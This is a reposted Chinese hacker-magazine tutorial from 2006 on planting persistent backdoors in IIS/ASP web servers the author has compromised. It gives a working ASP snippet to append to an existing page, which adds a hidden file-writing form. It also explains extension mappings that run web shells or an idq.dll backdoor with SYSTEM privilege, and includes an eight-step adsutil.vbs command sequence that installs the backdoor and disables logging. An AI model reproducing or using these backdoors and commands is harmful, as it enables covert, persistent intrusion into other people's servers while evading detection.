asp后门,ASP后门的放置方法的深入研究

ASP后门的放置方法的深入研究 - 网络安全 - 电脑教程网

ASP后门的放置方法的深入研究

日期:2006-05-13   荐:
作者:Lcx。 来源: 黑客X档案。

这是我架在本机的一个动网文章管理的登陆页面,和平常没什么两样,原有的功能都存在。 再看第二个图:

和图1比较一下,图1的url是http://192.168.1.3/ASP/wz/admin.asp,图2是http://192.168.1.3/asp/wz/admin.asp?id=1,在admin.asp后边加了一个参数"?id=1"就多出一个东东来了。图2下面这两个框,你可以在前边的输入框里输入文件名,后边的文本框可以复制你要的任意代码,点生成按扭可以生成在服务器上生成cgi/asp/PHP/aspx等网页后门或任意文本文件。这是怎么做到的呢?只要你将这段代码根据提示修改一下插入某个asp网页代码最下端即可。

<%
on error resume next
id=request("id")
if request("id")=1 then
testfile=Request.form("name")
msg=Request.form("message")
set fs=server.createObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
<form method="POST" ACTION="你要插入的asp文件名?id=1">
<input type="text" size="20" name="Name"
value=<%=server.mappath("XP.asp")%>>
<textarea name="Message" class=input>
</textarea>
<input type="submit" name="Send" value="生成" class=input>
</form>
<% end if%>


  值得注意的是这段代码要求服务器支持fso,并且它不是在所有的asp文件里都生效的。像被插入的asp文件有包含代码,即有<!--#include file="conn.asp"-->这样的代码,这段代码就不生效了,但不会影响原文件的使用。如果你会写asp,你还可以将一些asp后门直接写在肉鸡原有的asp文件里。

  asp后门放置方法之二在iis管理器中用asp.dll来解析任意后缀名。这样来做,依次打开电脑的控制面板-管理工具-Internet 服务管理器-web站点-右键属性-主目录-配置-添加。我添加了一个后缀为lcx的文件映射,用nt\system32下的asp.dll来解析。像图3:


这样做完以后,我们把常用的cmd.asp改名为cmd.lcx,然后运行,你看会发生什么? 图4:


一样是一个网页后门。当然,起个什么后缀显得更隐蔽,看你的聪明才知智了。

  asp后门放置方法之深入研究。我刚才是用了asp.dll来解析后缀为lcx的文件。如果我们用一个特殊的dll程序来解析.lcx的后缀呢?如果你会编程,当然可以根据自己的需要写一个dll程序。不会呢?哈,绿盟袁哥已经为我们写好了。想到了没有,就是那个idq.dll呀,可以传在scripts目录下用ispc来连接的idq.dll。U漏洞里提升权限常用的。现在我经用这个idq.dll按asp后门方法之二做好映射了,那么会发生什么呢?可以用它做两件事。一种是可以通过执行http://targetip/anything.lcx来在对方主机上加一个名为iisuser,密码为abcd1234的用户。图5:


这个xxx.lcx可以随便改名,主机不存在这个文件也可以。如果你还不满足,我们用nc登陆主机看看。键入如下命令。nc targetip 80
post /%08/ anything.lcx,怎么样?登陆上去了吧,在w2k+sp3下它可是system权限呀。图6:


原理在这儿限于篇幅我就不讲了,你可以上绿盟查查tombkeeper pgn写的IIS配置文件后门这篇文章。网友czy也写了一个同样的dll程序,用法就是在ie中执行http://ip/*.你设写的后缀?shell=你要的命令。看一下我用它在肉鸡上做的后门吧,我是用它来解析.ph4的后缀。图7:

[1] [2] [3]  



看到这里,你可能要说了,这个iis后门在3389终端里安装很方便,在命令行下呢?我们也有办法。iis默认安装下,会在/inetpub/adminscripts目录下生成19个vbs脚本,我们用其中的一个adsutil.vbs就可以帮我们装上这个奇妙的iis后门了。


运用方法如下,我们分8步走,看看命令行下的快乐吧:
1 copy idq.dll %systemroot%\system32\iisapi.dll
将idq.dll copy到系统盘的system32目录下,重命名为iisapid.ll
2得到虑拟站点的情况
cscript adsutil.vbs enum /p /w3svc
[/w3svc/Info]
[/w3svc/Filters]
[/w3svc/2]----------->这些就是拟虚拟站点了
[/w3svc/3]
[/w3svc/4]
[/w3svc/1]
3 得到IIS所有的有特权的DLL
adsutil.vbs set /W3SVC/InProcessIsapiApps
运后后查得如下dll
"C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" "C:\WINNT\System32\inetsrv\httpodbc.dll" "C:\WINNT\System32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll"
4.把得到IIS所有的有特权的DLL和将第1步copy过来的iisapi.dll设到InProcessIsapiApps组中,这样我们的后门就有了LOCAL_SYSTEM权限。这步中要将第三步查到的dll都加在这里,如果你不加的话,原有特权在dll就会被删除。
cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\System32\idq.dll" "C:\WINNT\System32\inetsrv\httpext.dll" "C:\WINNT\System32\inetsrv\httpodbc.dll" "C:\WINNT\System32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\WINNT\System32\iisapi.dll"
5.设置映射
cscript adsutil.vbs set /w3svc/scriptmaps
".asp,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".cer,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".asa,C:\WINNT\System32\inetsrv\asp.dll,1,GET,HEAD,POST,TRACE"
".idc,C:\WINNT\System32\inetsrv\httpodbc.dll,1,OPTIONS,GET,HEAD,POST,PUT,delete,TRACE"
".shtm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
".sHtml,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
".stm,C:\WINNT\System32\inetsrv\ssinc.dll,1,GET,POST"
".lcx,C:\winnt\system32\iisapi.dll,3,GET,HEAD,POST"
这里是默认安装下,在原有iis管理器中的映射加了一个.lcx的映射,用我们copy过来的iisapi.dll来解析,注意最后一行加的是.lcx的映射,你可以加个别的后缀名映射。
6.增加一个虚拟目录,设置虚拟目录的各项属性
cscript adsutil.vbs create /w3svc/2/root/root (目录名叫root)
cscript adsutil.vbs set w3svc/2/root/root/KeyType "IIsWebVirtualDir"
cscript adsutil.vbs set w3svc/2/root/root/AppRoot "/LM/W3SVC/2/Root/root"
cscript adsutil.vbs set w3svc/2/root/root/AppFriendlyName "root"
cscript adsutil.vbs set w3svc/2/root/root/AppIsolated 2
cscript adsutil.vbs set w3svc/2/root/root/AccessRead True
cscript adsutil.vbs set w3svc/2/root/root/AccessExecute True
cscript adsutil.vbs set w3svc/2/root/root/AccessScript True
7.增加虚拟目录root的映射.lcx,用iisapi.dll来解析
cscript adsutil.vbs set w3svc/2/root/root/ScriptMaps ".lcx,C:\winnt\system32\iisapi.dll,1"
8 不进行日志记录
adsutil.vbs set /w3svc/1/root/root/dontlog true


  需要说明的是adsutil.vbs 的命令虽然我是研究了好长时间才搞清楚的,但我用上述命令在三台肉鸡和我本机做试验时,只成功了两台。得到的结果好像是只有iis原有默认配置没有被修改的情况下才可以成功。为什么会这样,还是借杂志一角来期待研究过这个脚本和iis isapi的高手来解答吧,但在iis图形管理器中这个后门可是百分百成功。

  应当说,这三种方法置的后门可以说是目前最好的后门了。但是你要用肉鸡做什么呢?:-),看看我在本机抓的图吧,你会明白最好的肉鸡就是我们的电脑。便于大家学习,我将idq.dll、czy.dll、adsutil.vbs打包传在我网站,下载url是http://www.haiyang.net/safety/htm/iisback.rar。

 [1] [2] [3]  


(出处:http://www.sheup.com)


 [1] [2] [3] 


  应当说,这三种方法置的后门可以说是目前最好的后门了。但是你要用肉鸡做什么呢?:-),看看我在本机抓的图吧,你会明白最好的肉鸡就是我们的电脑。便于大家学习,我将idq.dll、czy.dll、adsutil.vbs打包传在我网站,下载url是http://www.haiyang.net/safety/htm/iisback.rar。

(出处:http://www.sheup.com)


 [1] [2] [3] [4] 

标签: